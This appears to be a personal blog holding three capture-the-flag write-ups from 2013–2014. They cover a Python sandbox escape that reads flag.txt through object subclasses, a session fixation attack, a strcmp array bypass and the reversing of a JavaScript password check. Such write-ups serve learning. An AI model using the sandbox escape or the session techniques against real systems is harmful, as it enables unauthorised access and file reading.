Monday, 22 September 2014

CSAW CTF 2014 Quals write-up


team r00t, we ended scoring 1250. None of the team members worked for more than half a day, and our team is small, containing 3 members. All lazy people :D

Exploitation - 1: bo



This was a simple problem, or we didn't know how to solve in the way it was meant to be.
As usual as soon as we saw a executable follow the usual procedure -

First, file type

> file bo

bo; ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped

Second, look for strings-

> strings bo

When we look at the strings. Oh wait is it the flag. Hell Yeah :D

Welcome to CSAW CTF!

Time to break out IDA Demo and see what's going on inside me.  :]

flag{exploitation_is_easy!}

Exploitation - 2: pybabbies


nc 54.165.210.171 12345

Connect the server with that particular port, We found python console showing up.
Afterwards we opened the source file 

As we played around with the console
- Found its Python 3.x
- It does not show any returned value.
  workaround: Just print the return value.
- Any error the execution will close the connection.

Time to analyse the source code. All the cool module and functions where banned :'(

Checked if there is already a variable with flag or key etc having the flag. And obviously it wasnt that easy. So, maybe there is a file with flag.txt or key.txt where the flag is and we have to open it.

As I have already read few blog posts about escaping Python sandbox, It was easy.

Playing around with tuple. Ended with an interesting part -

>>> print(().__class__.__bases__[0].__subclasses__()[40])

<type 'file'>

Now its obvious try opening flag.txt key.txt etc

>>> print(().__class__.__bases__[0].__subclasses__()[40]("flag.txt"))

<open file 'flag', mode 'r' at 0x.....>

Wow!!! It worked. Now just go ahead and read the file

Welcome to my Python sandbox! Enter commands below!
>>> print(().__class__.__bases__[0].__subclasses__()[40]('flag.txt').read())

flag{definitely_not_intro_python}

>>> exit



Thanks for reading through the write-up. If any thing wrong or can be added to this post. Please put them in the comments :)


Saturday, 19 July 2014

Volga CTF quals 2014

Team r00t managed only 700 points and secured 80th position

This was 1 really son of a difficult CTF

Web100-

If login successful, You will be given a particular phpsession.
Login was easy. you enter random name and it will get registered and access will be given.

Task was Session fixation.

After login in. In source we can see help.php


In link place give your link to the page where the session id is assigned.

and refresh the loged in page.

flag: Easy_task_on_Session_Fixation

Comments are welcomed...
Question solving skill: x7r0n

Web200-

Guess they where using strcmp function to password.
Change password to array elements.


response for the above request [image]

I don't know whether this is how challenge was made to be solved. But this shit worked :D

Comments are welcomed :)

Monday, 30 September 2013

Facebook CTF - ACCESS LEVEL 1 WriteUP

Facebook CTF 2013 - NcN 2013

There where only 3 access levels - web, android apk, and Linux executable. All where reverse engineering only.

Access Level - 1


Whatever input 'key' is given you get a alert saying 'Invalid password!'.

Tools -> browser with JavaScript console. I used Google Chrome :p

Analysing the source code we get -
<form action="login.php" method="POST" onsubmit="return encrypt(this);">

So onsubmit a "encrypt" function is called. So using the browser JavaScript console lets take a look at the script running behind.

 function encrypt(form)
 {
var res;
res=numerical_value(form.password.value);
res=res*(3+1+3+3+7);
res=res>>>6;
res=res/4;
res=res^4153;
if(res!=0)
{
alert('Invalid password!');
}
else
{
alert('Correct password :)');
}
form.key.value=numerical_value(form.password.value);
form.verification.value="yes"+simpleHash(form.password.value);
 return true;
 }

That's it. our work is simple - just to make the condition inside IF as FALSE. That can be achieved by making the var res = 0. So the reverse engineering work starts NOW.

Time to analyse the code and start reversing it.
- Before if we have XOR. so res should be equal to 4153 to make res=0
- res * 4 [ 4153*4 = 16612]
- >>> right shift so we have 16612 = X>>>6.
  16612 - 100000011100100
  we have no idea about the lost rightmost 6 bits. Taking it to 0's lets proceed.
  100000011100100+000000 -  1063168 But it can vary with +0 to +63.
- 1063168/(3+1+3+3+7) = 62539.2941176 ~ 62540.
-  now a weird function numerical_value

 function numerical_value(str)
 {
var i,a=0,b;
for(i=0;i<str.length;++i)
{
b=ascii_one(str.charAt(i));
a+=b*(i+1);
}
 return a;
 }

observe one more function ascii_one

function ascii_one(foo)
{
foo=foo.charAt(0);
var i;
for(i=0;i<256;++i)
{
var hex_i=i.toString(16);
if(hex_i.length==1)
hex_i="0"+hex_i;
hex_i="%"+hex_i;
hex_i=unescape(hex_i);
if(hex_i==foo)
break
}

But here no need to analyse. Just manual brute force of the var str; to get a appx value of 62540. I got 62545.
var str="zzaaaaaaaaaaaaaaaaaaaaaaddaaaaaspea";

start with random number of a's then modify here and there with the logic of starting strings have less weight-age and ending char's have the most!

so for me this is the key - "zzaaaaaaaaaaaaaaaaaaaaaaddaaaaaspea". It will vary from person to person.

After submiting the key -

Congrats! you passed the level! Here is the key: 23f8d1cea8d60c5816700892284809a94bd00fe7347645b96a99559749c7b7b8

*** Note this was easy because without knowing much of JavaScript i could solve it.
-> And a rough screenshot of manual brute force. So you can get a rough idea -
Please download OR open the image for clear view :D :D

-> Any one solved it in a much simpler way please comment your way for solving problem.
-> Suggestions/Comments are most welcomed !!! :)


Thanks for reading through

Happy hacking! Happy coding!!